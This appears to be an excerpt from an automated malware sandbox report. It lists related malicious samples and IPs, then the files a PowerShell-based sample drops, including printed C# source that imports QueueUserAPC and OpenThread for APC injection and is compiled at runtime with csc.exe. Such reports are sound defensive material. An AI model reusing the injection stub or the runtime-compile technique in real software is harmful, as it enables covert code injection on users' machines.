                                                          start[526268].vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          documentation_446618.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          start[873316].vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          nostalgia.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          ursi.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          OcEyzBswGm.exeGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          Invoice778465.xlsbGet hashmaliciousBrowse
                                                          • 208.67.222.222

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          NETRACK-ASRU2u2mgtylJy.dllGet hashmaliciousBrowse
                                                          • 194.147.86.221
                                                          NF3zeW1ZZO.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          OnjY219B7v.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          HS33i28Q3u.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          eKhZXMkd5v.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          vQP52P1Isj.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          D44D77232A9E6E684F1ECE4C9C05B3DCB63D4296CFD29.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          tWCGKtYHA3.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          1B18CE7B513855676EF76C17FCF6B6D492F20E197FAE1.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          t7mBrAjNrV.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          2D100CC76F229AC10A7589E1AEA0BFB47B5692840D8F2.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          4F1F6C55849D794E71B3F37EB1C700348E31A080EAA14.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          AC8CF25A55659954E3C2BDF2A3B53115F139BE50F049A.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          FVOW699wqS.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          BB265B16D6C6DAE08BBDF4E7798FE06AA676AC4A8AA9A.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          KxZXftb514.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          dg6r7HJdd4.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          UxR7Q2lLed.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          W8o6lejZD3.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          sAQnBjf2AF.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.8910535897909355
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                          MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                          SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                          SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                          SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                          Malicious:false
                                                          Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1192
                                                          Entropy (8bit):5.325275554903011
                                                          Encrypted:false
                                                          SSDEEP:24:3aEPpQrLAo4KAxCoOu42B15qRPNnCvK39tOBPnKdirh:qEPerB4BOu/9qRVnCvO9tOBfuit
                                                          MD5:D9D42CC091BE79AB1496C649F5585767
                                                          SHA1:5E23D29ACD70EE17F01DA4AB54BE562E33CC7980
                                                          SHA-256:5C0BFCE56791BB95902AF0280D2DED2FB46EEA5899AB08CB4A0955ABE86F08EA
                                                          SHA-512:6B962EDA66C17B5F531F6370C3B4567AC0CD23EE2F140B9352C4C178115C7E54CA456644D200E888AFF1A67D038E9605C8557B272377E99C2358FB856C67CFE0
                                                          Malicious:false
                                                          Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                          C:\Users\user\AppData\Local\Temp\380E.bi1
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):11
                                                          Entropy (8bit):1.2776134368191157
                                                          Encrypted:false
                                                          SSDEEP:3:111Qv:Luv
                                                          MD5:5B3345909519932D6670D92F16496463
                                                          SHA1:6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
                                                          SHA-256:0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
                                                          SHA-512:B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
                                                          Malicious:false
                                                          Preview: -------- ..
                                                          C:\Users\user\AppData\Local\Temp\RES20A.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.707958824120458
                                                          Encrypted:false
                                                          SSDEEP:24:p+fpt6nfHuhKdNfI+ycuZhNbWakSyHPNnq9qp0e9Ep:cOfkKd91ulqa3+q9H
                                                          MD5:9F22A8320D7A071B76FDC69EC539ECCB
                                                          SHA1:14333BA5399DAD87A67A7C9A7AFEB8740FCFEECE
                                                          SHA-256:9394AC09F500EBF590CEF7AA960C5BA829D34107A3156FD9258CB42DB78240DB
                                                          SHA-512:615184C6FB055548483C213F1B47960804AED79DC425C4387446B496D2C6948196D17408F2013694B44711163F2881F878BBAAF2AE292EDDD0BFF10711287AC9
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP..................<..)..,7@G.Z...........3.......C:\Users\user\AppData\Local\Temp\RES20A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RES47B.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.7147512751024414
                                                          Encrypted:false
                                                          SSDEEP:24:p+fqnfHuhKdNfI+ycuZhNRakSfPNnq9qpxe9Ep:cqfkKd91ulRa39q9e
                                                          MD5:56C427E4F156501570F09F60C71B4FFC
                                                          SHA1:E95259B5A9D2A7D6985794796C7D50E44F2ED54E
                                                          SHA-256:0DF94A4553794E9745768309E3143BF27364A91D236F4B7B3078172745404A9D
                                                          SHA-512:4DF6DE36B39C6AE6F8ECD8ACC31EEB1659FB4C75981086D5BD9D89560F7D7EAE4EE946E0E07BEC9F8095F15BA16CAB2679D500EB40C959B0452B3482FCBA76F8
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP........................x.7.............3.......C:\Users\user\AppData\Local\Temp\RES47B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESF604.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.704757091617058
                                                          Encrypted:false
                                                          SSDEEP:24:bZfF7LDfHvV0QhKdNNI+ycuZhNkqakS1bPNnq9qp1e9Ep:bBptdKd31ul3a37q9a
                                                          MD5:A19900A27924406D8B8C2B3967F7549E
                                                          SHA1:67086C00C8F2AD154A30F03F3B7B7FCC5CCA26AB
                                                          SHA-256:B10D3F322BEEB34F99285BE39628DEB06F88269B1C71D5AB201C1D4C873107B6
                                                          SHA-512:B24F2FA68DDBDDB024C3439363F240E98390EEC262BF791B83F9E032429B41F9610641EAD8BE66589E698765AE895B07D4CAD7324583854FBD7F363B7AB41818
                                                          Malicious:false
                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP................|VQh..|.8.r...............4.......C:\Users\user\AppData\Local\Temp\RESF604.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESF652.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):2.702279321283148
                                                          Encrypted:false
                                                          SSDEEP:24:p+fiijCDfHv6hKdNNI+ycuZhNxakSPPNnq9qp1e9Ep:ct44Kd31ulxa3Nq9a
                                                          MD5:68F64E91D72B2B0F972BCD7336F2A9CC
                                                          SHA1:2B4DA3BF145E15313E6796912E46193EC0CB0542
                                                          SHA-256:5AEBE77361A5E69CD2F4E5A7FD83CE17FEEFEFBC6C29E429A92471903DE78A00
                                                          SHA-512:7D6DD472E15D32B947CD7C7CC98073D00E05FAD1397E0B5BF4A00280DD0C9729F1B9783E8713C429AD221C12C1C76867E6EED624A266467D2C180868C97CF8A2
                                                          Malicious:false
                                                          Preview: ........T....c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP................N0........].=............4.......C:\Users\user\AppData\Local\Temp\RESF652.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1khnqhjk.loo.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psahr3sw.wpu.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tg4p345c.j2l.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1118070987658872
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuqak7Ynqq1bPN5Dlq5J:+RI+ycuZhNkqakS1bPNnqX
                                                          MD5:7C5651680CDC7C8F38DD72F6EFF7FCC1
                                                          SHA1:48F3B58D5CF23B80248D1220D2781699720AB0FC
                                                          SHA-256:5E443A37A5A1A69715E0C8D1C58A98CB0CEDAB7B9F9CF4F043FC43A37F4A2155
                                                          SHA-512:009D6016851CEC3F44A2664E385461C377E9179517BB89707B0C47093C358D583FD0E08367FF693CDC6B6B84DFF7F2E7D4DEBB4BAFB1003228945811C467985A
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.5.2.a.c.u.f.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.5.2.a.c.u.f.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.249748564356388
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftqhzxs7+AEszIwkn23ftqq9:p37Lvkmb6KRfFqhWZEifFqq9
                                                          MD5:1F903E4C6488F96BEFF8106212BB1FB8
                                                          SHA1:F83BA87CDA88445647CBC5287FEB88FB745303D9
                                                          SHA-256:9AE5B2762E43566A26D39530831229138A3DE4407243A22BF1CACA6DDC8C5EC1
                                                          SHA-512:72685413AF01FC6EFF547B0E3F7A18A2F3FA655FCF33566E7EA1368A9684DB674AFACD57FC30F1D010B54C0D1991A1CE1A079A0CBB84ADB231546E382457E871
                                                          Malicious:true
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.597551467700443
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpi94MatkZfltUaUI+ycuZhNkqakS1bPNnq:6XDWb5lxF1hJl61ul3a37q
                                                          MD5:C46F8C61C8CB705DF757CCCA39C5B679
                                                          SHA1:AF738C88BB2A7C2CF9D18F0A68179DCE724C13D7
                                                          SHA-256:DD862D783A4E8A31034B21655E7F80366CF2A745E821AB0E4D7EB0DD2749D3E2
                                                          SHA-512:9938809F33099A04070BC942239CF9C48B2F99CD2E7D77851939AEB1FA9A5DF6DCA46F7FF584E4183BC7ACEB2BFB7C88B3747ACE7ABC5A9481DA678590D01F9E
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1.*...................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.a52acufz.dll.stkml.W32.mscorlib.Sy
                                                          C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0863679805822777
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBVak7Ynqq4aPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                          MD5:A84E3090E4FC8017918EF55DA63D009A
                                                          SHA1:E15976679755FDC7CC21F13701703C98E72E7187
                                                          SHA-256:6CD9F5821875D9A6795771EEC4553888DCAEED39D713D8AAFD886594B22CDAC3
                                                          SHA-512:0BCECD1BFFAA5F7AAF3C1A402AAFF92770676B19B91A2EF3F785FB58F2993B9BAC01A55B3E39AEF19B43928ED008D1C468A0518CAD499E2E3C24AE14128E28AE
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.i.x.o.j.i.x.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):398
                                                          Entropy (8bit):4.993655904789625
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                                                          MD5:C08AF9BD048D4864677C506B609F368E
                                                          SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                                                          SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                                                          SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.22823213171567
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fx1CokCLGzxs7+AEszIwkn23fx1CokC:p37Lvkmb6KRfZ1jkHWZEifZ1jkC
                                                          MD5:FA407420BBC7FCEC54DFA5F57B2D7BFB
                                                          SHA1:5964FDCA13AB3C97EE75C4D5D15DEA6ED75A6FDC
                                                          SHA-256:E30540BE2C4911E47BBDF06B9F3DB165CD98DD7A4D77D028767C546DC3B50342
                                                          SHA-512:DE73CCC9D3540D976AA4E27DCA7ABA5D44DC8ABBA0810229DF904B1C52D51EA84AE908487E61E4C5E29B78546634DC52BBFFE3CE15052611093048A77A896307
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.590972462431772
                                                          Encrypted:false
                                                          SSDEEP:24:etGSXW/u2Dg85lxlok3Jgpiea4MatkZf28zaUI+ycuZhNxakSPPNnq:6XDWb5lxF11JVr1ulxa3Nq
                                                          MD5:2C829AD936178D4534050E2CF39B3F90
                                                          SHA1:5096E288CE9F5699BB3BB57930ED2B749692CA5B
                                                          SHA-256:E7ACFB204936BB5A36A6E11EC33A50BE09C01CF0104A556C03247B227F590B37
                                                          SHA-512:CD552B4F18D42DAB7B5E63FAE29715C3518CC9B26FB7DD08D12FFD1416585E734E650F8E5228C3E6F0115FC9A84BCE3ED9136A79CC2C2FBA204DF9E5B572EC0D
                                                          Malicious:false
